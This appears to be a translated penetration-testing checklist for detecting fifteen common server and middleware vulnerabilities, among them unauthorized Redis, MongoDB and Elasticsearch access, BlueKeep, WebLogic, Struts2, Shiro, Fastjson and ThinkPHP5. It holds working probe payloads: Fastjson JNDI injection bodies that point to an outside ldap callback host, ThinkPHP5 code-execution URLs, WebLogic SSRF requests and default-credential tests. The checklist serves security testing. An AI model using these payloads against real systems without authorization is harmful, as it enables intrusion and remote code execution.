Article directory
- 1. Unauthorized access to Redis
- 2. Unauthorized access to MongoDB
- 3. Unauthorized access to Elasticsearch
- 4. Unauthorized access to Rsync
- 5. Windows RDP remote code execution vulnerability (CVE-2019-0708)
- 6. Tomcat Web Console Weak Password
- 7. WebLogic console weak password & deserialization series vulnerabilities
- 8. WebLogic SSRF (no detection method)
- 9. WebLogic deserialization tool
- 10. JBoss Deserialization & Default Configuration Vulnerability
- 11. Apache Struts2 remote code execution vulnerability
- 12. Apache Shiro deserialization vulnerability (no detection method)
- 13. Fastjson deserialization vulnerability
- 14. Java RMI deserialization vulnerability (no detection method)
- 15. ThinkPHP5 code execution vulnerability
1. Unauthorized access to Redis
telnet <ip> <port>
Then enter info. If the Redis server version and other information is echoed, it means there is unauthorized access.
2. Unauthorized access to MongoDB
Use the tool “Robo 3T” to detect, create a connection to the MongoDB server, enter the IP address and port (the default port is 27017), and then click the Test button. If there is an unauthorized access vulnerability, it will prompt “Access to databases is available”
3. Unauthorized access to Elasticsearch
Directly access the Elasticsearch node data in the browser: http://www.example.com:9200/_nodes. When the information as shown below is leaked, it means that the unauthorized access vulnerability exists.
4. Unauthorized access to Rsync
Use the command rsync rsync://:/ (default port 873) on the command line to detect
If there is an unauthorized access vulnerability, you can use rsync rsync://:// to list all files in the path corresponding to the specified module.
5. Windows RDP Remote Code Execution Vulnerability (CVE-2019-0708)
Use the tool “rdpscan.exe” for detection. This tool supports detection of single IP segments, CIDR format IP addresses and IP address lists. The specific usage is as follows:
(a) rdpscan.exe 192.168.1.0/24
(b) rdpscan.exe 192.168.1.1 -p 13389
(c) rdpscan.exe –file ip.txt
6. Tomcat Web Console Weak Password
Run msfconsole in Kali Linux, use the auxiliary/scanner/http/tomcat_mgr_login module, set RHOSTS, RPORT (default is 8080), TARGETURL (default is /manager/html), and then run (run or exploit)
7. WebLogic console weak password & deserialization series vulnerabilities
Add a random string after the URL of the application system under test, and a 404 page appears. If the page content is as shown below, the middleware of the application system under test is WebLogic.
Test Methods
Use Burp Suite to capture the request to access the application system under test. In the repeater module, change the request method from GET to POST through the Change request method, change the POST URL to /bea_wls_deployment_internal/DeploymentService, and add the request header username: weblogic and password. : weblogic, and then send the request, as shown below:
If the password is incorrect, the “401 Unauthorized” status code is responded and the page displays “Invalid user name or password”. When the password is correct, the “500 Internal Server Error” status code is responded.
8. WebLogic SSRF (no detection method)
http://www.example.com:7001/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name & amp;txtSearchname=sdf & amp;txtSearchkey= & amp;txtSearchfor= & amp;selfor=Business + location & amp;btnSubmit= Search & amp;operator=http://127.0.0.1:7001
If the page content contains the string “weblogic.uddi.client.structures.exception.XML_SoapException”, the WebLogic middleware may have an SSRF vulnerability.
Modify the port number at the end of the URL to common ports such as 22, 80, 443, 7001, 8080, etc. If the following string appears on the page based on the port number, it indicates that there is an SSRF vulnerability.
9. WebLogic Deserialization Tool
10. JBoss Deserialization & Default Configuration Vulnerability
The packet capture found that the response header of the application system under test contains a JBoss string.
Or the 404 page of the application system under test contains JBossWeb string
Test Methods
Run msfconsole in Kali Linux, use the auxiliary/scanner/http/jboss_vulnscan module, set RHOSTS and RPORT (default is 80), and then run (run or exploit)
11. Apache Struts2 remote code execution vulnerability
Check the source code of the application system under test. The URL interface address ends with “.action” “.do” or the address contains the “!” symbol, or check the application directory /WEB-INF/lib/ on the server of the application under test. jar file, if there is a jar file in struts2-core-2..**.jar or xwork-core-2..**.jar format, you need to detect whether there is Struts2 remote code execution loopholes.
Detection Tool
12. Apache Shiro deserialization vulnerability (no detection method)
Use Burp Suite to capture the request to access the application system under test, add “rememberMe=1” to the cookie, and send the replay to the server. If the header of the response packet contains “Set-Cookie: rememberMe=deleteMe”, the test is Application systems are developed using Shiro components
On the server of the application under test, check the jar file in the directory /WEB-INF/lib/ where the application is located. If there is a jar file in the shiro-core-1...jar format, you need to check whether Shiro deserialization vulnerability exists
13. Fastjson deserialization vulnerability
Check the jar file in the directory /WEB-INF/lib/ on the server of the application under test. If there is a jar file in the fastjson-1.2.*.**.jar format, or capture the package and find the application system under test. If the response message contains the “com.alibaba.fastjson” string, you need to detect whether there is a fastjson deserialization vulnerability.
Detection method
As mentioned before, register a ceye.io account, use the fastjson deserialization vulnerability verification code and ceye.io’s second-level subdomain name http://ceye.io/profile to detect whether the target application has a fastjson deserialization vulnerability. Method as follows:
Use Burp Suite to capture the request package containing json data, and modify the request body content to the following detection content (can be detected in sequence):
(a) {“@type”:”java.net.InetAddress”,”val”:”fastjson..ceye.io “}
(b) {“@type”:”com.sun.rowset.JdbcRowSetImpl”,”dataSourceName”:”ldap://fastjson..ceye.io /” ,”autoCommit”:true}
(c) {“name”:{“@type”:”java.lang.Class”,”val”:”com.sun.rowset.JdbcRowSetImpl”},”x”:{“@type”:”com. sun.rowset.JdbcRowSetImpl”,”dataSourceName”:”ldap://fastjson.******.ceye.io /”,”autoCommit”:true}}
Then visit http://ceye.io/records/dns. If a third-level subdomain name resolution record starting with fastjson appears on the page, it means that the target has a fastjson deserialization vulnerability, as shown below:
14. Java RMI deserialization vulnerability (no detection method)
When the server where the application system under test is located opens port 1099 or uses nmap (nmap -v -A -p1-65535) to perform port scanning on the server, nmap identifies that the service type of a certain port of the server is Java RMI Registry, and it needs to be detected to see if it exists. Java RMI Deserialization Vulnerability
15. ThinkPHP5 code execution vulnerability
Access the application system under test. If the error page content contains “Ten Years of Sharpening a Sword – A High-Performance Framework Designed for API Development”, as shown below, the application system under test was developed using ThinkPHP5. .
Detection method
http://www.example.com/index.php?s=index/\think\app/invokefunction & amp;function=call_user_func_array & amp;vars[0]=md5 & amp;vars[1][] =hi
If the response packet contains the string “49f68a5c8493ec2c0bf489821c21fc3b”, it indicates that there is a code execution vulnerability, as shown below:
POST [_method=__construct & amp;filter[]=phpinfo & amp;method=get & amp;get[]=1] to http://www.example.com/?s=captcha, if the response packet contains phpinfo information, it indicates that there is a code execution vulnerability
